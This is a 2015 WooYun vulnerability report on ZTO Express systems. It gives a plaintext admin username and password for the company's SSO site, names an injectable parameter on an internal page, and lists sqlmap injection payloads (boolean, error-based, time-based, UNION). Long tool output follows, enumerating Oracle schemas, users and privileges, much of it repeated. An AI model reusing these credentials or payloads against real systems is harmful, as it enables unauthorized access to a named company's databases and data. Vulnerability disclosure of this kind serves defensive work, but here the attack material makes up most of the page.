当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151036

漏洞标题:中通快递某站后台弱口令+SQL注射影响22个库

相关厂商:中通速递

漏洞作者: 路人甲

提交时间:2015-11-01 13:47

修复时间:2015-12-17 09:32

公开时间:2015-12-17 09:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-01: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

后台弱口令+SQL注射

详细说明:

https://sso.zt-express.com/


账号:zto73619
密码:zto888888

1.png


2.png


3.png


4.png


5.png


不再一一列举
SQL注入点

it.zt-express.com/Views/New/NewView.aspx?id=39937


Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 E
LSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))
) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(7
4)||CHR(114),5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(11
3)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105
)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(
106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL FROM DUAL--
---
[13:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[13:01:22] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[13:01:22] [INFO] fetching database (schema) names
available databases [22]:
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB


Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(11
3)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105
)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(
106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL FROM DUAL--
---
[13:09:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[13:09:53] [INFO] fetching database users
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
[13:09:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\it.zt-express.com'
[*] shutting down at 13:09:53


Payload: id=39937 AND 5460=5460
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
available databases [22]:
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=39937 AND 5460=5460
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=39937 AND 5460=5460
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
database management system users privileges:
[*] ANONYMOUS [1]:
    privilege: CREATE SESSION
[*] AQ_ADMINISTRATOR_ROLE [6]:
    privilege: CREATE EVALUATION CONTEXT
    privilege: CREATE RULE
    privilege: CREATE RULE SET
    privilege: DEQUEUE ANY QUEUE
    privilege: ENQUEUE ANY QUEUE
    privilege: MANAGE ANY QUEUE
[*] CONNECT [1]:
    privilege: CREATE SESSION
[*] CRM [19]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: ALTER ANY INDEX
    privilege: CREATE ANY CLUSTER
    privilege: CREATE ANY INDEX
    privilege: CREATE ANY JOB
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY TYPE
    privilege: CREATE JOB
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: EXECUTE ANY PROCEDURE
    privilege: SELECT ANY TABLE
[*] CTXSYS [7]:
    privilege: ALTER SESSION
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SESSION
    privilege: CREATE SYNONYM
    privilege: CREATE VIEW
    privilege: DROP PUBLIC SYNONYM
    privilege: UNLIMITED TABLESPACE
[*] DBA [160]:
    privilege: ADMINISTER ANY SQL TUNING SET
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: ADMINISTER RESOURCE MANAGER
    privilege: ADMINISTER SQL TUNING SET
    privilege: ADVISOR
    privilege: ALTER ANY CLUSTER
    privilege: ALTER ANY DIMENSION
    privilege: ALTER ANY EVALUATION CONTEXT
    privilege: ALTER ANY INDEX
    privilege: ALTER ANY INDEXTYPE
    privilege: ALTER ANY LIBRARY
    privilege: ALTER ANY MATERIALIZED VIEW
    privilege: ALTER ANY OUTLINE
    privilege: ALTER ANY PROCEDURE
    privilege: ALTER ANY ROLE
    privilege: ALTER ANY RULE
    privilege: ALTER ANY RULE SET
    privilege: ALTER ANY SEQUENCE
    privilege: ALTER ANY SQL PROFILE
    privilege: ALTER ANY TABLE
    privilege: ALTER ANY TRIGGER
    privilege: ALTER ANY TYPE
    privilege: ALTER DATABASE
    privilege: ALTER PROFILE
    privilege: ALTER RESOURCE COST
    privilege: ALTER ROLLBACK SEGMENT
    privilege: ALTER SESSION
    privilege: ALTER SYSTEM
    privilege: ALTER TABLESPACE
    privilege: ALTER USER
    privilege: ANALYZE ANY
    privilege: ANALYZE ANY DICTIONARY
    privilege: AUDIT ANY
    privilege: AUDIT SYSTEM
    privilege: BACKUP ANY TABLE
    privilege: BECOME USER
    privilege: CHANGE NOTIFICATION
    privilege: COMMENT ANY TABLE
    privilege: CREATE ANY CLUSTER
    privilege: CREATE ANY CONTEXT
    privilege: CREATE ANY DIMENSION
    privilege: CREATE ANY DIRECTORY
    privilege: CREATE ANY EVALUATION CONTEXT
    privilege: CREATE ANY INDEX
    privilege: CREATE ANY INDEXTYPE
    privilege: CREATE ANY JOB
    privilege: CREATE ANY LIBRARY
    privilege: CREATE ANY MATERIALIZED VIEW
    privilege: CREATE ANY OPERATOR
    privilege: CREATE ANY OUTLINE
    privilege: CREATE ANY PROCEDURE
    privilege: CREATE ANY RULE
    privilege: CREATE ANY RULE SET
    privilege: CREATE ANY SEQUENCE
    privilege: CREATE ANY SQL PROFILE
    privilege: CREATE ANY SYNONYM
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY TRIGGER
    privilege: CREATE ANY TYPE
    privilege: CREATE ANY VIEW
    privilege: CREATE CLUSTER
    privilege: CREATE DATABASE LINK
    privilege: CREATE DIMENSION
    privilege: CREATE EVALUATION CONTEXT
    privilege: CREATE EXTERNAL JOB
    privilege: CREATE INDEXTYPE
    privilege: CREATE JOB
    privilege: CREATE LIBRARY
    privilege: CREATE MATERIALIZED VIEW
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE PROFILE
    privilege: CREATE PUBLIC DATABASE LINK
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE ROLLBACK SEGMENT
    privilege: CREATE RULE
    privilege: CREATE RULE SET
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE SYNONYM
    privilege: CREATE TABLE
    privilege: CREATE TABLESPACE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DEBUG ANY PROCEDURE
    privilege: DEBUG CONNECT SESSION
    privilege: DELETE ANY TABLE
    privilege: DEQUEUE ANY QUEUE
    privilege: DROP ANY CLUSTER
    privilege: DROP ANY CONTEXT
    privilege: DROP ANY DIMENSION
    privilege: DROP ANY DIRECTORY
    privilege: DROP ANY EVALUATION CONTEXT
    privilege: DROP ANY INDEX
    privilege: DROP ANY INDEXTYPE
    privilege: DROP ANY LIBRARY
    privilege: DROP ANY MATERIALIZED VIEW
    privilege: DROP ANY OPERATOR
    privilege: DROP ANY OUTLINE
    privilege: DROP ANY PROCEDURE
    privilege: DROP ANY ROLE
    privilege: DROP ANY RULE
    privilege: DROP ANY RULE SET
    privilege: DROP ANY SEQUENCE
    privilege: DROP ANY SQL PROFILE
    privilege: DROP ANY SYNONYM
    privilege: DROP ANY TABLE
    privilege: DROP ANY TRIGGER
    privilege: DROP ANY TYPE
    privilege: DROP ANY VIEW
    privilege: DROP PROFILE
    privilege: DROP PUBLIC DATABASE LINK
    privilege: DROP PUBLIC SYNONYM
    privilege: DROP ROLLBACK SEGMENT
    privilege: DROP TABLESPACE
    privilege: DROP USER
    privilege: ENQUEUE ANY QUEUE
    privilege: EXECUTE ANY CLASS
    privilege: EXECUTE ANY EVALUATION CONTEXT
    privilege: EXECUTE ANY INDEXTYPE
    privilege: EXECUTE ANY LIBRARY
    privilege: EXECUTE ANY OPERATOR
    privilege: EXECUTE ANY PROCEDURE
    privilege: EXECUTE ANY PROGRAM
    privilege: EXECUTE ANY RULE
    privilege: EXECUTE ANY RULE SET
    privilege: EXECUTE ANY TYPE
    privilege: EXPORT FULL DATABASE
    privilege: FLASHBACK ANY TABLE
    privilege: FORCE ANY TRANSACTION
    privilege: FORCE TRANSACTION
    privilege: GLOBAL QUERY REWRITE
    privilege: GRANT ANY OBJECT PRIVILEGE
    privilege: GRANT ANY PRIVILEGE
    privilege: GRANT ANY ROLE
    privilege: IMPORT FULL DATABASE
    privilege: INSERT ANY TABLE
    privilege: LOCK ANY TABLE
    privilege: MANAGE ANY FILE GROUP
    privilege: MANAGE ANY QUEUE
    privilege: MANAGE FILE GROUP
    privilege: MANAGE SCHEDULER
    privilege: MANAGE TABLESPACE
    privilege: MERGE ANY VIEW
    privilege: ON COMMIT REFRESH
    privilege: QUERY REWRITE
    privilege: READ ANY FILE GROUP
    privilege: RESTRICTED SESSION
    privilege: RESUMABLE
    privilege: SELECT ANY DICTIONARY
    privilege: SELECT ANY SEQUENCE
    privilege: SELECT ANY TABLE
    privilege: SELECT ANY TRANSACTION
    privilege: UNDER ANY TABLE
    privilege: UNDER ANY TYPE
    privilege: UNDER ANY VIEW
    privilege: UPDATE ANY TABLE
[*] DBMS [2]:
    privilege: CREATE SESSION
    privilege: UNLIMITED TABLESPACE
[*] DBSNMP [4]:
    privilege: CREATE PROCEDURE
    privilege: CREATE TABLE
    privilege: SELECT ANY DICTIONARY
    privilege: UNLIMITED TABLESPACE
[*] DIP [1]:
    privilege: CREATE SESSION
[*] DMSYS [15]:
    privilege: ALTER SESSION
    privilege: ALTER SYSTEM
    privilege: CREATE JOB
    privilege: CREATE LIBRARY
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE SYNONYM
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
    privilege: CREATE VIEW
    privilege: DROP PUBLIC SYNONYM
    privilege: QUERY REWRITE
[*] EXFSYS [8]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: CREATE ANY TRIGGER
    privilege: CREATE INDEXTYPE
    privilege: CREATE JOB
    privilege: CREATE LIBRARY
    privilege: CREATE OPERATOR
    privilege: MANAGE SCHEDULER
    privilege: UNLIMITED TABLESPACE
[*] EXP_FULL_DATABASE [8]:
    privilege: ADMINISTER RESOURCE MANAGER
    privilege: BACKUP ANY TABLE
    privilege: EXECUTE ANY PROCEDURE
    privilege: EXECUTE ANY TYPE
    privilege: READ ANY FILE GROUP
    privilege: RESUMABLE
    privilege: SELECT ANY SEQUENCE
    privilege: SELECT ANY TABLE
[*] IMP_FULL_DATABASE [68]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: ADMINISTER RESOURCE MANAGER
    privilege: ALTER ANY PROCEDURE
    privilege: ALTER ANY TABLE
    privilege: ALTER ANY TRIGGER
    privilege: ALTER ANY TYPE
    privilege: ANALYZE ANY
    privilege: AUDIT ANY
    privilege: BECOME USER
    privilege: COMMENT ANY TABLE
    privilege: CREATE ANY CLUSTER
    privilege: CREATE ANY CONTEXT
    privilege: CREATE ANY DIMENSION
    privilege: CREATE ANY DIRECTORY
    privilege: CREATE ANY INDEX
    privilege: CREATE ANY INDEXTYPE
    privilege: CREATE ANY LIBRARY
    privilege: CREATE ANY MATERIALIZED VIEW
    privilege: CREATE ANY OPERATOR
    privilege: CREATE ANY PROCEDURE
    privilege: CREATE ANY SEQUENCE
    privilege: CREATE ANY SQL PROFILE
    privilege: CREATE ANY SYNONYM
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY TRIGGER
    privilege: CREATE ANY TYPE
    privilege: CREATE ANY VIEW
    privilege: CREATE DATABASE LINK
    privilege: CREATE PROFILE
    privilege: CREATE PUBLIC DATABASE LINK
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE ROLLBACK SEGMENT
    privilege: CREATE TABLESPACE
    privilege: CREATE USER
    privilege: DROP ANY CLUSTER
    privilege: DROP ANY CONTEXT
    privilege: DROP ANY DIMENSION
    privilege: DROP ANY DIRECTORY
    privilege: DROP ANY INDEX
    privilege: DROP ANY INDEXTYPE
    privilege: DROP ANY LIBRARY
    privilege: DROP ANY MATERIALIZED VIEW
    privilege: DROP ANY OPERATOR
    privilege: DROP ANY OUTLINE
    privilege: DROP ANY PROCEDURE
    privilege: DROP ANY ROLE
    privilege: DROP ANY SEQUENCE
    privilege: DROP ANY SQL PROFILE
    privilege: DROP ANY SYNONYM
    privilege: DROP ANY TABLE
    privilege: DROP ANY TRIGGER
    privilege: DROP ANY TYPE
    privilege: DROP ANY VIEW
    privilege: DROP PROFILE
    privilege: DROP PUBLIC DATABASE LINK
    privilege: DROP PUBLIC SYNONYM
    privilege: DROP ROLLBACK SEGMENT
    privilege: DROP TABLESPACE
    privilege: DROP USER
    privilege: EXECUTE ANY PROCEDURE
    privilege: EXECUTE ANY TYPE
    privilege: GLOBAL QUERY REWRITE
    privilege: INSERT ANY TABLE
    privilege: MANAGE ANY QUEUE
    privilege: RESUMABLE
    privilege: SELECT ANY TABLE
    privilege: UPDATE ANY TABLE
[*] JAVADEBUGPRIV [2]:
    privilege: DEBUG ANY PROCEDURE
    privilege: DEBUG CONNECT SESSION
[*] MDDATA [1]:
    privilege: UNLIMITED TABLESPACE
[*] MDSYS [14]:
    privilege: CREATE ANY TRIGGER
    privilege: CREATE INDEXTYPE
    privilege: CREATE LIBRARY
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TYPE
    privilege: CREATE VIEW
    privilege: DELETE ANY TABLE
    privilege: DROP PUBLIC SYNONYM
    privilege: UNLIMITED TABLESPACE
[*] NEWZTOOA [3]:
    privilege: ALTER ANY TABLE
    privilege: ALTER TABLESPACE
    privilege: UNLIMITED TABLESPACE
[*] OEM_ADVISOR [3]:
    privilege: ADMINISTER SQL TUNING SET
    privilege: ADVISOR
    privilege: CREATE JOB
[*] OEM_MONITOR [7]:
    privilege: ADVISOR
    privilege: ANALYZE ANY
    privilege: ANALYZE ANY DICTIONARY
    privilege: CREATE JOB
    privilege: CREATE SESSION
    privilege: MANAGE ANY QUEUE
    privilege: SELECT ANY DICTIONARY
[*] OGG_SYNC [2]:
    privilege: CREATE SESSION
    privilege: UNLIMITED TABLESPACE
[*] OLAP_DBA [10]:
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY VIEW
    privilege: CREATE JOB
    privilege: CREATE SESSION
    privilege: DELETE ANY TABLE
    privilege: DROP ANY TABLE
    privilege: DROP ANY VIEW
    privilege: INSERT ANY TABLE
    privilege: SELECT ANY TABLE
    privilege: UPDATE ANY TABLE
[*] OLAP_USER [5]:
    privilege: CREATE JOB
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE VIEW
[*] OLAPSYS [14]:
    privilege: CREATE ANY DIMENSION
    privilege: CREATE ANY SYNONYM
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE VIEW
    privilege: DROP ANY DIMENSION
    privilege: DROP ANY SYNONYM
    privilege: DROP PUBLIC SYNONYM
    privilege: SELECT ANY DICTIONARY
    privilege: SELECT ANY TABLE
    privilege: UNLIMITED TABLESPACE
[*] ORACLE_OCM [1]:
    privilege: SELECT ANY DICTIONARY
[*] ORDPLUGINS [10]:
    privilege: CREATE INDEXTYPE
    privilege: CREATE LIBRARY
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TYPE
    privilege: DROP PUBLIC SYNONYM
    privilege: UNLIMITED TABLESPACE
[*] ORDSYS [13]:
    privilege: CREATE ANY SYNONYM
    privilege: CREATE INDEXTYPE
    privilege: CREATE LIBRARY
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TYPE
    privilege: CREATE VIEW
    privilege: DROP ANY SYNONYM
    privilege: DROP PUBLIC SYNONYM
    privilege: UNLIMITED TABLESPACE
[*] OUTLN [3]:
    privilege: CREATE SESSION
    privilege: EXECUTE ANY PROCEDURE
    privilege: UNLIMITED TABLESPACE
[*] READONLY [2]:
    privilege: CREATE SESSION
    privilege: SELECT ANY TABLE
[*] RECOVERY_CATALOG_OWNER [11]:
    privilege: ALTER SESSION
    privilege: CREATE CLUSTER
    privilege: CREATE DATABASE LINK
    privilege: CREATE PROCEDURE
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE SYNONYM
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
    privilege: CREATE VIEW
[*] RESOURCE [8]:
    privilege: CREATE CLUSTER
    privilege: CREATE INDEXTYPE
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE SEQUENCE
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
[*] SCHEDULER_ADMIN [6]:
    privilege: CREATE ANY JOB
    privilege: CREATE EXTERNAL JOB
    privilege: CREATE JOB
    privilege: EXECUTE ANY CLASS
    privilege: EXECUTE ANY PROGRAM
    privilege: MANAGE SCHEDULER
[*] SI_INFORMTN_SCHEMA [1]:
    privilege: UNLIMITED TABLESPACE
[*] SYS [159]:
    privilege: ADMINISTER ANY SQL TUNING SET
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: ADMINISTER RESOURCE MANAGER
    privilege: ADMINISTER SQL TUNING SET
    privilege: ADVISOR
    privilege: ALTER ANY CLUSTER
    privilege: ALTER ANY DIMENSION
    privilege: ALTER ANY EVALUATION CONTEXT
    privilege: ALTER ANY INDEX
    privilege: ALTER ANY INDEXTYPE
    privilege: ALTER ANY LIBRARY
    privilege: ALTER ANY MATERIALIZED VIEW
    privilege: ALTER ANY OUTLINE
    privilege: ALTER ANY PROCEDURE
    privilege: ALTER ANY ROLE
    privilege: ALTER ANY RULE
    privilege: ALTER ANY RULE SET
    privilege: ALTER ANY SEQUENCE
    privilege: ALTER ANY SQL PROFILE
    privilege: ALTER ANY TABLE
    privilege: ALTER ANY TRIGGER
    privilege: ALTER ANY TYPE
    privilege: ALTER DATABASE
    privilege: ALTER PROFILE
    privilege: ALTER RESOURCE COST
    privilege: ALTER ROLLBACK SEGMENT
    privilege: ALTER SESSION
    privilege: ALTER SYSTEM
    privilege: ALTER TABLESPACE
    privilege: ALTER USER
    privilege: ANALYZE ANY
    privilege: AUDIT ANY
    privilege: AUDIT SYSTEM
    privilege: BACKUP ANY TABLE
    privilege: BECOME USER
    privilege: CHANGE NOTIFICATION
    privilege: COMMENT ANY TABLE
    privilege: CREATE ANY CLUSTER
    privilege: CREATE ANY CONTEXT
    privilege: CREATE ANY DIMENSION
    privilege: CREATE ANY DIRECTORY
    privilege: CREATE ANY EVALUATION CONTEXT
    privilege: CREATE ANY INDEX
    privilege: CREATE ANY INDEXTYPE
    privilege: CREATE ANY JOB
    privilege: CREATE ANY LIBRARY
    privilege: CREATE ANY MATERIALIZED VIEW
    privilege: CREATE ANY OPERATOR
    privilege: CREATE ANY OUTLINE
    privilege: CREATE ANY PROCEDURE
    privilege: CREATE ANY RULE
    privilege: CREATE ANY RULE SET
    privilege: CREATE ANY SEQUENCE
    privilege: CREATE ANY SQL PROFILE
    privilege: CREATE ANY SYNONYM
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY TRIGGER
    privilege: CREATE ANY TYPE
    privilege: CREATE ANY VIEW
    privilege: CREATE CLUSTER
    privilege: CREATE DATABASE LINK
    privilege: CREATE DIMENSION
    privilege: CREATE EVALUATION CONTEXT
    privilege: CREATE EXTERNAL JOB
    privilege: CREATE INDEXTYPE
    privilege: CREATE JOB
    privilege: CREATE LIBRARY
    privilege: CREATE MATERIALIZED VIEW
    privilege: CREATE OPERATOR
    privilege: CREATE PROCEDURE
    privilege: CREATE PROFILE
    privilege: CREATE PUBLIC DATABASE LINK
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE ROLLBACK SEGMENT
    privilege: CREATE RULE
    privilege: CREATE RULE SET
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE SYNONYM
    privilege: CREATE TABLE
    privilege: CREATE TABLESPACE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DEBUG ANY PROCEDURE
    privilege: DEBUG CONNECT SESSION
    privilege: DELETE ANY TABLE
    privilege: DEQUEUE ANY QUEUE
    privilege: DROP ANY CLUSTER
    privilege: DROP ANY CONTEXT
    privilege: DROP ANY DIMENSION
    privilege: DROP ANY DIRECTORY
    privilege: DROP ANY EVALUATION CONTEXT
    privilege: DROP ANY INDEX
    privilege: DROP ANY INDEXTYPE
    privilege: DROP ANY LIBRARY
    privilege: DROP ANY MATERIALIZED VIEW
    privilege: DROP ANY OPERATOR
    privilege: DROP ANY OUTLINE
    privilege: DROP ANY PROCEDURE
    privilege: DROP ANY ROLE
    privilege: DROP ANY RULE
    privilege: DROP ANY RULE SET
    privilege: DROP ANY SEQUENCE
    privilege: DROP ANY SQL PROFILE
    privilege: DROP ANY SYNONYM
    privilege: DROP ANY TABLE
    privilege: DROP ANY TRIGGER
    privilege: DROP ANY TYPE
    privilege: DROP ANY VIEW
    privilege: DROP PROFILE
